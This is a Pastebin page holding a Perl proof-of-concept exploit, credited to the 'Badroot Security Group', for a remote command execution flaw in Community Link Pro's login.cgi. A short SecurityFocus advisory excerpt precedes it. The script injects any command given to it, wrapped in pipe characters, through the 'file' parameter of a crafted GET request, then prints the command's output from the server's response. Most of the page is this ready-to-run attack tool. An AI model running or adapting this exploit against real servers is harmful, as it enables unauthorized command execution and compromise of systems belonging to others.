Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- source: http://www.securityfocus.com/bid/14097/info
- Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
- Due to this, an attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server.
- #!/usr/bin/perl
- # ___ ___ __
- # \_ |__ _____ __| _/______ ____ _____/ |_
- # | __ \\__ \ / __ |\_ __ \/ _ \ / _ \ __\
- # | \_\ \/ __ \_/ /_/ | | | \( <_> | <_> ) |
- # |___ (____ /\____ | |__| \____/ \____/| | Security Group
- # \/ \/ \/ ||
- # \/
- # Login.cgi Remote Command Execution PoC Exploit
- # by: spher3 - spher3@fatalimpulse.net
- # www.badroot.org
- use strict;
- use IO::Socket::INET;
- sub USAGE()
- {
- print "USAGE:\n",
- "perl $0 [host] [path] [cmd]\n\n",
- "EXAMPLE:\n",
- "perl www.site.org /webeditor/ \"uname -a\"\n\n";
- exit 0;
- }
- USAGE unless $ARGV[2];
- my $host = $ARGV[0];
- my $path = $ARGV[1];
- my $cmds = join ( '%20', split ( / /, $ARGV[2] ) );
- my $vuln = $path . "login.cgi?username=&command=simple&do=edit&password=&file=|" . $cmds . "|";
- print "Badroot Security Group - www.badroot.org\n",
- "Login.cgi Remote Command Execution\n\n",
- "- Target: $host\n",
- "- Path: $path\n\n";
- my $sock = IO::Socket::INET->new ( PeerAddr => $host,
- PeerPort => 80,
- Proto => "tcp",
- Type => SOCK_STREAM ) || die "Error: $!\n";
- print $sock "GET " . $vuln ." HTTP/1.1\n\r",
- "Accept: */*\r\n",
- "User-Agent: Bad\r\n",
- "Host: $host\r\n",
- "Connection: Keep-Alive\r\n\r\n";
- my $lE = 0;
- while ( <$sock> )
- {
- if ( $_ =~ /<\/textarea/ )
- {
- $lE = 0;
- close ( $sock ) && exit 0;
- }
- print $_ if $lE == 2;
- ++$lE if $lE == 1;
- if ( $_ =~ /<textarea/ )
- {
- ++$lE;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement